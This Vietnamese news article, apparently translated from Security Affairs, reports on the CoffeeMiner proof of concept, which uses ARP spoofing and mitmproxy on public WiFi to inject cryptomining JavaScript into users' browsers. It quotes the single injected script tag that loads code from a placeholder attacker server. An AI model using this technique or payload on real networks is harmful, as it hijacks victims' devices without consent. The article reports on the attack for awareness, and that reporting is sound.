Nguyễn Phú Trọng » An ninh Quốc phòng – Biển Đảo » CoffeeMiner – phương pháp tấn công điểm phát WiFi để đào tiền ảo

(Không gian mạng) - Việc tỷ giá Bitcoin không ngừng tăng đang khiến tin tặc luôn tìm mọi cách có thể đánh cắp ví tiền ảo hoặc tài nguyên máy tính từ các nạn nhân.

Một nhà phát triển có tên Arnau vừa công bố một dự án nghiên cứu PoC (proof-of-concept) mang tên “CoffeeMiner”, chứng minh khả năng tấn công các mạng Wi-Fi công cộng để chèn dòng code đào tiền ảo vào các phiên trình duyệt được kết nối. Đây là một phương pháp tinh vi giúp tin tặc có thể nhanh chóng kiếm tiền từ những hành vi bất hợp pháp.

coffeeMiner-network-attack

Các chuyên gia giải thích dự án này của Arnau được lấy cảm hứng từ vụ WiFi của một quán cà phê Starbucks bị tin tặc lợi dụng để tấn công máy tính xách tay kết nối với mạng này nhằm lợi dụng sức mạnh tính toán của các thiết bị vào việc đào tiền ảo.

Arnau đã trình bày cách thức triển khai một cuộc tấn công MITM (Man (Person) -In-The-Middle) để chèn một số javascript vào các trang html mà người dùng truy cập vào. Theo cách này, tất cả các thiết bị kết nối với mạng WiFi đều bị buộc phải đào một loại tiền ảo nào đó.

CoffeeMiner hoạt động bằng cách giả mạo các thông điệp ARP (Address Resolution Protocol) trên một mạng nội bộ để đánh chặn lưu lượng không được mã hóa của các thiết bị khác cũng kết nối vào mạng đó.

Cuộc tấn công MiTM được thực hiện nhờ sử dụng phần mềm mitmproxy cho phép đưa dòng mã HTML (dưới đây) vào lưu lượng truy cập không được mã hóa và có liên quan đến nội dung truy vấn của những người dùng khác trên hệ thống mạng đó:

<script src=”http://httpserverIP:8000/script.js” type=”text/javascript”></script>

 

“mitmproxy là một công cụ phần mềm cho phép chúng tôi phân tích lưu lượng chay qua qua một máy chủ và chỉnh sửa lưu lượng truy cập đó. Trong trường hợp của chúng tôi, chúng tôi sẽ sử dụng nó để đưa các javascript vào các trang html”, Arnau viết.

“Để làm cho quy trình trông sạch hơn, chúng tôi chỉ chèn một dòng mã vào các trang html. Dòng mã html sau đó sẽ chạy phần mềm khai thác tiền ảo javascript”.

Khi trình duyệt của người dùng chạy các trang có chèn mã độc, trình duyệt sẽ chạy mã JavaScript và lợi dụng CPU time để tạo ra Monero nhờ phần mềm khai thác tiền ảo CoinHive.

Arnau đã thiết lập một máy ảo để chứng minh cuộc tấn công, và ông cũng công bố hai video PoC trình bày cuộc tấn công trong môi trường ảo hóa và trong thế giới mạng WiFi thật.

Lâm Quang Dũng (Lược dịch từ: Security Affairs)

Bài viết, video, hình ảnh đóng góp cho chuyên mục vui lòng gửi về [email protected]
Thích và chia sẻ bài này trên: